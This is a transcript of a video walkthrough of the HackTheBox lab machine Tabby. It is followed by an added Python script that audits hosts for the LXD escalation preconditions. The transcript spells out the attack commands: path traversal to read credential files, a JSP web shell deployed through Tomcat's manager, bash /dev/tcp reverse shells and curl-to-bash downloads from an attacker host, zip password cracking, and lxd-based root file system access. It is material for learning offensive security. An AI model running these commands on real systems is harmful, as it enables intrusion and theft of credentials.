HackTheBox - Tabby
Key Takeaways
The video walks through the HackTheBox Tabby machine using Nmap, Burp Suite and curl. The chain is a path-traversal file read in the Apache site's news.php (an LFI backed by file_get_contents, so it cannot execute code), used to dump Tomcat's tomcat-users.xml; deploying a JSP web shell through the Tomcat manager text interface with those credentials; cracking a password-protected backup zip with John to obtain a password that also works for the user ash; and abusing ash's lxd group membership to mount the host file system inside a privileged container and read root's SSH key.
Full Transcript
What's going on YouTube, this is IppSec. We're doing Tabby from HackTheBox, which was released as an easy machine, but due to the exploit chains I think it may be more along the lines of a medium. That being said, all the exploits here are pretty straightforward. You start off with access to both Apache and Tomcat. The Apache doesn't have any authentication, Tomcat does. So poking around the Apache web server you find an LFI vulnerability that you cannot turn into code execution, but you can use it to dump configuration files. So we dumped the tomcat-users.xml file, which grants us manager access into Tomcat. That gives us the ability to drop a web shell to the server and get code execution that way. Once on the server we have to do a little bit of magic involving cracking a zip file to get access to a user. That user is a member of the lxd group, so we can upload an LXC container, then use that container to read files off the root file system. So with all that being said, let's just jump in. As always, we're going to start off with the Nmap: -sC for default scripts, -sV to enumerate versions, -oA to output all formats and put it in the nmap directory, but before you do that we have to create that directory. So put it in the directory, call it tabby, then the IP address, which is 10.10.10.194. I am going to add the -v flag so it shows me open ports as it finds them, and I'm also going to run this with sudo. And we can see a few ports found right away: we have 8080, 80 and 22. So let's take a look at port 80 because that's just HTTP and that's generally where I like starting. So go to 10.10.10.194 and we get a web page. It's Mega Hosting, dedicated service starting from 99 USD, and this looks very similar to one of the boxes I've seen in HackTheBox Battlegrounds. I do see a copyright of 2016, so maybe I should be looking for some type of CVE or something, because this may be the last time the page has been modified. We can go over all these links; I'm just seeing if they take us anywhere else. I'm
looking at the bottom left of my browser and I don't see it changing, nothing changing there. We have an email address and a phone number, but nothing too interesting. Again, clicking the link just brings us back to the home page. Click on Home, look through each of these links; again, look at the bottom left, they're going nowhere. Infrastructure just goes down here, Free Trial doesn't appear to go anywhere, just back home. Going over to this News link we can see it says megahosting.htb/news.php, and I probably want to create this DNS host entry before doing it, because I know megahosting.htb is not going to resolve, which means I'm going to go somewhere and my DNS is going to get cached. So if I add this in my host entry, we do sudo vi /etc/hosts and do 10.10.10.194. I actually have to... it helps if I don't make a typo when I type it: 10.10.10.194, and the hostname is megahosting.htb. If I try to go to this domain still it's not going to exist, megahosting.htb, because the DNS is cached. I can try clearing the cache, but I don't think this actually does it; these are things I know to clear. We can restart Firefox; it's probably cached in the OS or something that I need to run a command for. But now if we go to megahosting.htb, let's see, oh, it actually loaded that time. Maybe it's just a time thing, maybe it takes a minute for DNS to, I guess, get old and pull a new record, or maybe closing and opening Firefox did it or something. But now when we click on this News we see "We apologize to our customers for the previous data breach. We have changed the site to remove this tool and invested heavily in more secure servers." However, we can see it's using this parameter. I'm going to guess this is like statement.php or something: statement.php, let's see, nothing; maybe .txt, .html. But just thinking about how this parameter works, I'm guessing file is pulling some type of file, so I'm going to send this over to Burp Suite because I want to try path traversal to see if we can make it pull other files. So let's
go over to Burp Suite, go to Proxy, and again the reason why I'm using Burp Suite to do this is because you can't really do path traversal in a web browser. If I turn this off and we try like ../../ a bunch of these, /etc/passwd, to see what happens... oh, it does. I'm used to web browsers and stuff taking off these ../'s; I'm not sure why it didn't do that, but I always prefer exploiting in Burp Suite. But we can see it definitely works with path traversal; I didn't actually expect that to work. But we could play with this more, maybe like index, or maybe ../index.php, and it looks like we get the PHP page. So we just try index.php, what do we get? Nothing. So the statement is in some directory; we don't know where statement is, but it's definitely somewhere. We could probably figure this out by doing a PHP filter to grab the source code for this PHP page, because if we look back at this... oh, we should grab the news.php page, which will tell us exactly how this file parameter works. So let's grab that. In order to grab PHP you will have to do PHP filters, and I wonder if we're actually going to be able to do it with this. We'll try php://filter/convert.base64-encode/resource=; I think that's it, maybe it's base64.encode, let's try base64.encode. That one is for some reason so hard to memorize, but I can just Google "php filter base64 encode" and we'll see what we did wrong: convert.base64, so convert.b64-en... really, convert.base64-, yep, okay. Let's just copy this because I probably made a typo somewhere: resource=. So I'm guessing we can't do this because we don't control the full path. So I'm guessing if we looked at the parameter, it's something like include path plus, what's the argument, file. So since we don't control this path piece before the file we can't do this PHP filter; so that's probably why that's not working, because it looks like we have this coded correctly according to this. We
could just try news.php, but yeah, it's not working. So I'm guessing what's getting put into file is like /var/www/html/ some folder, so maybe like notes, and then that's what the parameter actually looks like, which is invalid code; but if we didn't have something before this it would work. So can't do that. We can again grab files, so ../'s /etc/passwd, and we got that. The other thing I'd probably check is, let's just do ../news.php. Wait, we didn't need to do that, that's funny. So this is a file_get_contents. So there's two things in PHP: there's file_get_contents and there's like include; there's probably other ways to include files, but these are the two main ones. include is going to execute everything within the PHP tag, so if the file had this, the include would execute this and we wouldn't be able to get the source code. So that's why I was trying to do the filter, because it's probably doing the file_get_contents, which doesn't execute code, so we can just read files, so we can see exactly what the code is. And it's as I expected: it goes into a files directory and then gets that parameter. So it doesn't look like there's anything we can really do with this, and because we now know this won't execute code even if we find PHP code, upload it and put it there, I'm just going to switch and just look for things to extract out of this, because we know this is just LFI with no possibility of code execution. So we can try /etc/passwd; let's try a bunch of ../'s and we can see the users on this box. We got /home/ash, so let's see if I try to go /home/ash/.ssh, /home/ash/.ssh/authorized_keys; created this file... we can't, we shouldn't ever be able to read that file, it's just again something I check. Checking the history, doesn't look like we can get anything out of that. I'm gonna try like /proc/self/environ, cmdline; it does work, so let's see, cd /proc/self here, see what files we have, and environ is what I wanted because this would give me the username of what
I'm running. I'm guessing I'm Apache because cmdline is apache2 -k start, so I'm probably the www-data user or apache, probably not running as ash. We can go back to the Nmap to see if anything exists; let's just go to a new pane, go in nmap, cat tabby.nmap, and oh, we had Tomcat running, so we had a port 8080 we can look at. And this is an Ubuntu box, but we can take a look at port 80 or port 8080. So let's go to 10.10.10.194:8080 and we just get a default Tomcat page. We can try /admin, it doesn't exist; /manager, sweet. So we can try like tomcat:tomcat or admin:tomcat; these are all just defaults of Tomcat. We can try manager:tomcat. I think SecLists actually has a bunch of default passwords, so if you didn't know the default passwords of Tomcat you just go to like /opt/SecLists, find . | grep tomcat, and it's under the Passwords directory, Default-Credentials, tomcat, their default password list. So a bunch of default passwords for Tomcat that we could try; however, we have an LFI to read files, so we can probably just use this LFI here to read the tomcat-users.xml file and get the password. So let's go to Google real quick: "location tomcat-users.xml ubuntu", and let's see, where is it? I think it's in /usr/share, so we can try this one first, /etc/tomcat7. So let's try this, /etc/tomcat7/tomcat-users, doesn't exist. Let's see, /usr/share; let's see, /usr/share/tomcat7, then probably /etc/tomcat, /usr/share/tomcat/etc, maybe tomcat7. Let's see, sometimes getting the path is always the hardest part of LFIs. So /usr/share/tomcat7 then bin/catalina.sh; so this isn't going to give us the file we want, but it's a predictable file that would help us identify if we're even in the right directory. Let's see, /usr/share/tomcat7/bin/catalina.sh, nope. The other thing we could be doing wrong is a wrong Tomcat version, so let's go take a look at our error message, and it doesn't say anything. Let's just go to 8080 and we have Tomcat 9. So we're trying to do tomcat7 when the server is running Tomcat 9, so
let's try changing this to tomcat9, catalina.sh, and there we go, we get the directory. So now we can try to figure out where the tomcat-users was. So was it /etc/tomcat/tomcat-users.xml, tomcat-user.xml, or is it just in etc? Let's try users; there we go. So we found the tomcat-users.xml file, and here we have the credentials: we have tomcat and the password is this. So I'm going to go back to my box; let's just open a new pane, close this one, go to the tmux home, and vi creds.tomcat, and we'll do, I think it was manager... say, what was the credential? No, user was tomcat, yeah, there we go. I normally do like application.user, password, but application.username is the same thing and may confuse me down the line, so that's why I just did that. Let's see, /manager, tomcat, password: access denied. What are we? User role, we're admin, admin-gui. Let's see, by default manager is only accessible from a browser on the same machine. So let's check if AJP is installed. AJP is like a Tomcat proxy; I think that's on port 8006 or 8009, but if that is there it's going to allow us to proxy through the server and hit this admin page on localhost. So let's do nmap -p 8009 10.10.10.194, run it with sudo, and it is closed. So let's see, we may be able to just hit the upload piece manually and then do a PUT request, so text/deploy, there we go. So this is the endpoint in Tomcat which you can interact with via command line and just deploy applications. So Tomcat is just a way of running a bunch of Java applications; Tomcat files are WAR files, W-A-R. So we said deploy, Tomcat app or file, curl; it probably has a way like curl --upload-file, manager/deploy. So that's essentially what we're going to be doing. The first thing we need to do is create a WAR file to work with. We could either do msfvenom or grab a webshell and do it through the web shell. I prefer doing it through the web shell, mainly just because msfvenom generally does like optimized code that I don't fully understand, and I just think web shell
code is easier to read. The web shell place I like going to is called tennc, T-E-N-N-C, and we're just going to clone this into our opt directory. So cd /opt, git clone, and I may even have this still; it doesn't look like I do. But now we can just go to webshell and we have a bunch of web shells, so we can just do ls. I think jsp's one, yeah. So inside of jsp there's a lot of web shells we can choose from; like, that's the one downside about this repo, it's not finding the webshell you want, it's deciding on the webshell you use. Let's see what shell.jsp looks like; that's a lot of code to use, so it's probably a good web shell, but not what I want to do first. I think cmdjsp.jsp is one I generally use. You can see I can read all the code without scrolling, so if something fails it's probably going to be easy to find where it failed, and that's why I like this web shell. So I'm going to copy this file into htb/tabby and we're just gonna go there, and looking at this shell, note that Linux cmd and Windows cmd /c plus cmd; so we probably should go down to this exec and remove cmd.exe /c because that is, I guess, for Windows, and now this web shell should work. I'm going to change this form method to POST, just be... whoa, deleted way too much. Just because I really don't like doing GET requests, I'd rather do POST because it gives me more freedom in the variables I use in my request, and it also doesn't send everything to the log file. The input name I'm going to change from the default to PleaseSubscribe, and the main reason I do this is I never like doing a web shell and leaving all the defaults, because if someone comes along and finds cmdjsp.jsp they can just look at the source, see the parameter name it uses and take advantage of that web shell. So that's why I generally change that type of stuff. If you screw up there's a chance that you just think your web shell doesn't work, which sucks, but I mean that's the issue with security: every now and then security breaks something and
you end up troubleshooting things. I think that webshell is good, so we can do curl -T and then cmdjsp; I think that's all we need. We need username; I think in curl username is just -u. Let's go and cat credentials, and I'm probably gonna send this to the proxy just so you can see what a request looks like. Let's see, I'm screwing it all up real quick, forgive me. I think this is how we do username, and then 10.10.10.194/manager/text/deploy, and what are the variables for deploy? Let's see, "curl -T manager text deploy", there we go, this looks like it's going to be good: curl -T, see, that's on deploy; undeploy is remove, so config user... make this bigger for you. I think it's like endpoint or app; let's see, it's just a config file. Oh, there we go, path; path is what we want. We can do path, so text/deploy?path= we'll just say /app. And let's see, actually let's just Wireshark this; if I need sudo wireshark... off the top of my head I don't know exactly how to send curl through a proxy, it's probably -p, but this will work as well. Method not allowed, manager/text/deploy, and we didn't see anything, what? Oh, that's my own tun1. There we go, so this is what the request looks like: we Follow TCP Stream, you can see PUT and then the path, Authorization (this is going to be the credentials), here's the file I'm trying to PUT, and it says method not allowed. So, oh wait, I see, we're hitting Apache, not Tomcat. So let's go back up and we can do port 8080, and deployed application at /app but context failed to start, and this is because I'm not using a WAR file. Tomcat doesn't know how to handle just JSPs; it needs to be in a WAR file, which you can just do zip cmdjsp.war and then put the file name. I don't know exactly why it's so specific, but that's how Tomcat is. So let's change this to be a WAR file. App already exists, so we'll do, I guess, app2, and deployed application to /app2. Let's go over and check this out, so we can do megahosting, change this
to port 8080, /app2/cmdjsp.jsp, sweet, we found it. We do ls, we have files. So let's go intercept this again with Burp Suite to see if we can do this in a POST request. So whoami; we have to change it to here, whoami, send, and we are sending it in a POST request, so that's what we wanted. We can run any command we want, but generally the command we like doing is a reverse shell. So bash -c bash -i /dev/tcp/10.10.14 (my IP is not shown) .3/9001 0>&1; that should be good. I'm going to run a script command and we'll say shell.out, and all that does is it's going to log everything to shell.oi, not out, because I made a typo, but I always like doing these when I do reverse shells just so I know what commands I sent. We send this, and we actually did not get a shell. -c bash -i, weird. Oh, probably URL encode, so let's highlight this, Ctrl+U, send, and we still did not get one. Let's see, I think that is right, but maybe we just can't do this type of reverse shell. So let's go to Google and go to reverse shell cheat sheet to try a different shell: "shell cheat sheet pentestmonkey". I hate when this happens, there we go. So bash -i, looks like that's correct. I'm going to try something: let's just try full path, 10.10.14.3.
That's definitely it. Let's see, is it /bin/bash, is that where it is? which bash, /usr/bin/bash; we can try that path, still nothing. So I just don't think it likes this type of reverse shell, which is fine. We can try, we could have put this in the JSP file probably and had that work. This is the other one I like trying, so we can go back here; I'm gonna do which nc, we have nc on the box. We could probably nc -h to get a help, maybe not. Let's put this to 10.10.14.3 port 9001, Ctrl+U, run it, and we still don't get a shell. So what I'm going to do is see if we can even hit this port; it could be a firewall. So which curl, we have curl on the box; curl 10.10.14.3:9001, we hit it. So maybe it's just this reverse shell, or this command shell thing doesn't like sending all these special characters in this. So what we can do is save a file to the disk. So I'm going to make the www, I'm going to do shell.sh: bash -c -i... was it like that or like that? I think /dev/tcp/10.10.14.3/9001 0>&1, okay. And we can do python3 -m http.server, sudo, listening on port 8000, so we can curl :8000/shell.sh and we get that file; we can output it to /tmp/sh, yeah, /tmp/sh is fine. So we save that file to the disk and now we can just try to execute it: bash /tmp/sh, and do we still have a reverse shell? We don't. I'm going to exit and then we're going to run the script command again because we have so much, like, just pollution in that log file. So -lvnp 9001 and we got a shell. So this reverse shell payload, or not reverse shell, this cmdjsp.jsp just didn't like all the special characters, so that's why we wrote it to a file and then executed the file, because we got around special characters. The other thing we could try doing is, if we didn't want to touch disk, we could potentially pipe that over to bash, and it doesn't work because again that special character. So there's probably a way around it; if you want you can play with it. For me, I'm just going to do bash /tmp/sh to get the reverse shell. So
we can do export TERM=xterm so we can clear the screen. I thought we'd be able to clear the screen, there we go, and begin poking around at this box. The first thing I want to do is look for where my application's actually installed; I'm going to guess it's in this webapps directory, and the reason why I want to see where it's installed is just to see if there's other applications. We can see we got app2.war, app2, app.war; I think this is just the JSP file we had uploaded. So yeah, that's just the JSP file, so that's why Tomcat errors: it expects a WAR file, which is really just a zip, and then it unzips it. Since the very first time we did this exploit we didn't give it a zip, it failed unzipping it and that was the issue. We don't see any applications we don't expect here, so I'm going to guess that Tomcat, we don't need to go to... uh oh, I don't have a TTY, so I hit Tab and it couldn't autocomplete. So I'm gonna do python3 -c 'import pty; pty.spawn("/bin/bash")', okay, and then Ctrl+Z, stty raw -echo, hit fg, Enter twice, and now we'll be able to do like tab autocomplete and things like that. Also I can just hit Ctrl+L to clear the screen instead of Ctrl+L then Enter to send that key. But let's go to /var/www/html to see if we missed anything in this directory. There is a readme.txt that looks like we missed, but there's nothing important there. There is the files directory, so this is where the statement was; then we have revoked_certs, archive and this backup file. I'm just gonna do find . -type f to see what's there in a file, and archive and revoked_certs are empty but this backup is not. So I'm going to do a du -hs on the backup file, 12K; can we just base64 that? Then let's see, go up, yeah, it's not big, and then copy this all to the clipboard and we'll put it back on our machine. There's a bunch of ways we could copy the file, but that's generally how I like doing it if it's a small file. So this will be backup.zip.b64, paste, base64 -d
backup, now backup.zip, and then we can unzip the backup and it wants a password. Password is password, nope; password1, nope. So we don't have the password. So do we have a zip2john? We do, so we can do zip2john on backup.zip. Wait, what? Okay, here it is; I don't know why it output a lot more, I expected just to get the hash, but okay. See, pkzip2, guessing this is what we want; actually it's probably this whole line. So what I'm thinking is this whole line: we got the file name, the hash, and then the files within the zip. I'm going to try outputting this to a file and we can just call it hash.zip, and awesome, so all these we're not going to send out; maybe this is the standard error message. So let's see, if we run it to /dev/null we only get the hash, so yeah, I think this is standard error. But if we cat, what did we call it, zip, we get the thing we can pass over to John. So we can copy this, and then I'm going to go over to the Kraken, which is just a box in my basement that I use for cracking machines, or cracking hashes, and the reason why I always do it separately is because, number one, you shouldn't crack things in a VM, and number two, I don't like cracking things on my host operating system where I'm recording videos because I may drop frames. So I'm gonna create the file tabby and we're gonna put it here, and hashcat I don't think cracks zips, so we have to use John. So I'm gonna /opt, and then I have John installed, and just john; I can do ./john ~/tabby and then --wordlist=/opt/wordlist/rockyou.txt, and it says it has cracked it, the password is admin@it. You can also do --show and it'll go through John's like pot file and tell you the password. So we have it right here, but we can get out of the Kraken and we'll try to unzip it. So I'm going to make the temp; I'm just going to move backup.zip inside of temp, and the reason why I'm moving it in this folder is because when you unzip things sometimes they have a tendency of dropping files in the current working
directory instead of creating a new one, which then just creates a whole mess. So let's do that, put admin@it as the password, it was in my clipboard, and we have a few files: index.php, news.php. So let's go over to this and let's see, do we have like a password in this? grep -i password .; I'm going to do -R, capital R, to be recursive; db, pass, username, and I'm going to make sure this is working with "main", and I just said main because I read main there, so we know we'd grab something. We could potentially md5sum every file and we'll send this to pane one. Let's see, we can just exit here and md5sum the files here; we gotta go up a directory, md5sum everything here, and we can see readme looks to be the same, index... there's a difference of index. See, base64 -w0 index.php; see, I think, let's just not do -w0, I'll put an echo afterwards so it puts a blank line, there we go. So now we can grab index.php and we'll see what the difference is; we just got to put this on the same box where index.php is, so index.php.2.
Can we write a file? See, we can't, so let's go to cd /tmp. And the other thing I forgot was this was base64, so index.php.b64; that's not it, there we go, base64 -d index.php.b64 to index.php, and we can do a diff on the two files. So index.php /var/www/html/index.p... what? md5sum, did I just copy the wrong file? That's something I would do: base64 index.php -w0, echo; yeah, I probably copied the wrong file now that I'm looking at this. So copy that and we can do vi, I'm just going to do i.b64, paste, base64 -d i.b64 to index.php, diff, and less -S. Maybe some things are different, like it looks like the Call Us phone number is different, the email is different, so xspeedstudio at gmail versus sales at megahosting. So it looks like they grabbed a Bootstrap template from somewhere and just changed some information on the template, since those things changed; so it's not like connecting to a database and doing something. And a cat /etc/passwd, and we do have that ash user. I'm gonna try su - ash and admin@it, I think, with the password, and that is ash's password. Well, we could try it as root, admin@it, and it doesn't look like we can. sudo -l, admin@it, what? Ran sudo -l; that's weird, "ash may not run sudo on tabby". I'm going to try sshing ash@10.10.10.194, accept the fingerprint, and we can't get in. Let's see, cd /home, .ssh, cd .ssh, ssh-keygen -f id_rsa, and then we'll cat id_rsa.pub > authorized_keys, and I'm just making this so we can SSH into the box, because I like having an SSH shell more than a reverse shell. Number one, I mean, it stands out: if we do ps -aef --forest we can see what a shell looks like; that looks bad. Also, like, the TTY and everything is just perfect, so that's why I like SSH. vi id_rsa, paste the key, chmod 600 id_rsa, we can get rid of this Wireshark, ssh -i id_rsa ash@10.10.10.194 and we get in with SSH. So we can exit all this, reset here, and the script is done. So if we wanted to we can less shell.out and we can see everything we did on
the box. So if we ever forgot the password for ash and we didn't write it down, we could just go back here and it should show admin, su - ash. So maybe the password actually did not show in the script; but yeah, maybe if we strings it out, -i admin, yeah, maybe script won't go and grab that password prompt, interesting. But we are on the box as ash, so we can do a find . to see what else there is here. We created that SSH key; we can look at bash history, nothing there; we did ls -la, we would see it's mounted to /dev/null. So we don't really have anything to go off of, so I'm gonna go to /dev/shm and run linPEAS. So cd www, cp ../privilege-escalation-awesome-scripts-suite/linPEAS/linpeas.sh here, and curl 10.10.14.3 port 8000 linpeas.sh, pipe it over to bash, and then we just got to start a Python server and it's going to run linPEAS. So I will pause the video and we'll resume when this is done; it only takes a few minutes. So yeah, linPEAS is finished, so I'm going to search back for 99, because 99 doesn't really exist anywhere and generally gets me to the top of linPEAS output, so that's why I like doing it. And I'm just going to search for where I see highlighted yellow, and right off the bat I see user groups and lxd. So lxd is commonly associated with privesc. I'm going to just press Page Down to see if we see any other ones that are just highlighted in yellow that stick out, but that's gonna be the first thing I take a look at, because that's where it's highlighted. So we have it highlighted there; let's see, super user... ash is highlighted because that's our username, so that's nothing; adm, that doesn't look like anything. So again just looking for that highlighted yellow and doesn't look like we have anything, but I'm going to go to Google and say "lxd privesc hacktricks" and then go to this very top one. This book.hacktricks.xyz is just a really good reference point when you're looking to do things. So for this to work we have to create a container and then we upload the
container, load it, and then that container can read files on the root disk. So this is going to be installing things on our box, so let's run all of this. I just copy that and we can paste; so paste doesn't look like it did all that much. So the last command it ran was this wget, so apt, wait, I don't think it did the apt update and everything, what? Yeah, that did not do everything, so let's just copy these one at a time. So sudo apt update; the next one's going to be install. I don't think I have the squashfs-tools, so that's what we're gonna have to do. So install looks like it is installing something, then we have to do a go get to clone the repo and then we go in. So I'm just gonna pause the video, let this apt finish installing. And now that it's done installing we can go and do this next one, which is a go get, go into that directory, make, cd; it's weird they have you do a cd command with no arguments, so we'll do cd after this finishes. Okay, run cd; I guess cd with no arguments goes to your home directory, today I learned. Do that, we can go into this directory, then download this, then we do this command, and "bad alpine release", that's not good. See, home, distrobuilder build-lxd, okay, I guess maybe this version is just too old. Search for that, and would we download this images alpine.yaml? This is master, that shouldn't be... that should be most up-to-date. Let's see, got this error message, see, "expected", something about run by a server. This looks like the simplest solution; let's try adding that, so -o, hey, it's doing something, so I think that's what we needed, that -o. And I think we have that lxd.tar.xz; I think that's the file we want, so let's see, yep, that's what we want. So we want to send this file over to the target, so let's do mv lxd.tar.xz and rootfs.squashfs to htb/tabby/www, then we can download them. So I'm just going to go in the temp directory; these files could be big, so that's why I'm doing it in /tmp and not in /dev/shm. Let's do python and wget 10.10.14.3/
lxd.tar.xz, oh, port 8000. Then we need to do root.squashfs, file not found; rootfs.squashfs, rootfs... if I can type or talk it would definitely help me. There we go, rootfs.squashfs. So now we got both of those files, so we should be able to do the lxd image import, and now we can do image list. I guess we should have done this image list before importing, because it could have been a machine, but it doesn't look like there was. And then we run this next command. So what this is going to do is start up the container, or take this image, create it as a container called privesc and set security.privileged to true, which I believe gives it access over the host disk. And "no storage pool found"; let's see, let's do lxc list real quick to see if that exists now; it does not. So I think we have to create a storage pool. So again let's search this error message, see how to fix this. Solution: lxd init does have us run... nope, let's try lxd init. No, sure, yes, I guess just choose default options; so many options, sure. Let's see, does this create? Now we can try this one, the init command, there we go. So now if we do lxc list we have our container privesc, and that is security.privileged true. So this one is going to add the host root of / to /mnt/root in our container, and recursive is going to allow us to go through directories. Okay, so we have now added a new mount point to this container, and the mount point /mnt/root points to our host disk of /. So we can start the container and then we can execute; so lxc exec privesc, that's the name of the container, then sh, and do id. We are root in our container. If we do cd /, we can go to, what was it, /mnt/root, and now we are root in our host operating system. So we can probably just go to /root again and there's root.txt; we go .ssh and there is an id_rsa key. So we can just copy this and we'll save this on our disk as root and SSH in as root. So let's do vi, let's do a new window, vi root.key, we will paste
chmod 600 root key sh sh-i and then root at 10 10 10 194 and we're in as root so that is the box hope you guys enjoyed take care and i will see you all next time
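The escalation walked through above depends on two host conditions: an unprivileged account sitting in the `lxd` group, and LXD accepting a container with `security.privileged` set to `true` plus a disk device whose `source` is the host's `/`. The following audit script is an added example for defenders, not IppSec's code or anything from the video; it checks both conditions against constructed sample input shaped like `/etc/group` and the YAML that `lxc config show <container>` prints. The tiny YAML parser, the container names `privesc` and `web`, and the group line for `ash` are all assumptions made for the sample.

```python
"""Audit for the LXD privilege-escalation preconditions seen in the Tabby
walkthrough: lxd group membership, privileged containers, and disk devices
that expose the host root filesystem. All inputs below are constructed samples."""

from typing import Dict, List


def parse_simple_yaml(text: str) -> Dict:
    """Minimal parser for the nested `key: value` subset of YAML that
    `lxc config show <container>` emits (assumption: two-space indentation,
    no lists, no multi-line scalars)."""
    root: Dict = {}
    stack = [(-1, root)]  # (indent level, mapping currently being filled)
    for raw in text.splitlines():
        if not raw.strip() or raw.lstrip().startswith("#"):
            continue
        indent = len(raw) - len(raw.lstrip(" "))
        key, _, value = raw.strip().partition(":")
        value = value.strip().strip('"')
        while stack[-1][0] >= indent:  # leave mappings at equal/deeper indent
            stack.pop()
        parent = stack[-1][1]
        if value == "":  # a bare key opens a nested mapping
            child: Dict = {}
            parent[key] = child
            stack.append((indent, child))
        else:
            parent[key] = value
    return root


def lxd_group_members(group_file: str) -> List[str]:
    """Return the members of the `lxd` group from /etc/group text.
    LXD documents this group as root-equivalent, so every member is a finding."""
    for line in group_file.splitlines():
        fields = line.split(":")
        if len(fields) == 4 and fields[0] == "lxd":
            return [m for m in fields[3].split(",") if m]
    return []


def audit_container(name: str, config_text: str) -> List[str]:
    """Flag a privileged container and any disk device sourced from host /."""
    cfg = parse_simple_yaml(config_text)
    findings: List[str] = []
    if cfg.get("config", {}).get("security.privileged") == "true":
        findings.append(f"{name}: security.privileged=true (uid 0 inside is uid 0 on the host)")
    for dev, props in cfg.get("devices", {}).items():
        if props.get("type") == "disk" and props.get("source") == "/":
            findings.append(f"{name}: disk device '{dev}' exposes host / at {props.get('path')}")
    return findings


def audit_host(group_file: str, containers: Dict[str, str]) -> List[str]:
    """Combine group-membership and per-container findings for one host."""
    findings = [f"group: '{m}' is in lxd (root-equivalent)" for m in lxd_group_members(group_file)]
    for name, cfg in containers.items():
        findings.extend(audit_container(name, cfg))
    return findings


# Constructed sample: an /etc/group excerpt with a non-root user in lxd.
SAMPLE_GROUP = """\
root:x:0:
sudo:x:27:ash
lxd:x:116:ash
"""

# Constructed sample: `lxc config show` style output for the container from the walkthrough.
SAMPLE_PRIVESC_CONFIG = """\
architecture: x86_64
config:
  image.os: alpine
  security.privileged: "true"
devices:
  mydevice:
    path: /mnt/root
    source: /
    type: disk
    recursive: "true"
  root:
    path: /
    pool: default
    type: disk
ephemeral: false
name: privesc
"""

# Constructed sample: an unprivileged container with only its own root disk.
SAMPLE_BENIGN_CONFIG = """\
architecture: x86_64
config:
  image.os: alpine
devices:
  root:
    path: /
    pool: default
    type: disk
name: web
"""

if __name__ == "__main__":
    for finding in audit_host(SAMPLE_GROUP, {"privesc": SAMPLE_PRIVESC_CONFIG, "web": SAMPLE_BENIGN_CONFIG}):
        print(finding)
```

On a real host, feed the script the contents of `/etc/group` and the output of `lxc config show <name>` for each container listed by `lxc list`. Any non-administrator in the `lxd` group should be removed, and the appearance of a new privileged container or a disk device sourced from `/` is a strong signal that this chain is being run.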
Original Description
00:00 - Intro
00:55 - Start of Nmap
01:25 - Taking a look at the web page
02:40 - Discovering Megahosting.HTB and adding it to /etc/hosts
04:04 - Playing with news.php and explaining the logic of LFI
08:40 - Discovering it is a file_get_contents(), which means we can skip all our "RCE Tests" as it won't execute PHP Code
11:20 - Poking at Tomcat and hunting for its tomcat-users.xml file to use with our LFI on apache2
17:30 - Uploading a JSP Webshell to tomcat with credentials found in tomcat-users.xml
20:20 - Using Curl to upload the JSP webshell.
23:10 - Whoops was uploading to the wrong port and then forgot to convert the JSP to a WAR File
25:38 - Reverse shells having trouble running due to bad characters.
27:55 - Downloading the shell to disk, then executing it in order to avoid special characters
31:15 - Reverse shell returned and TTY fixed. Discovering an encrypted zip file that we crack with John
35:00 - Exploring the Zip file to find there's nothing really interesting
39:00 - Trying the zip password as users on the box and getting a shell as Ash, dropping an SSH key and logging in with ash
42:00 - Running linpeas
43:00 - Discovering user is a member of LXD Group
44:42 - Building an alpine container, then uploading it to the target machine
47:45 - Uploading the alpine container and using lxc to privesc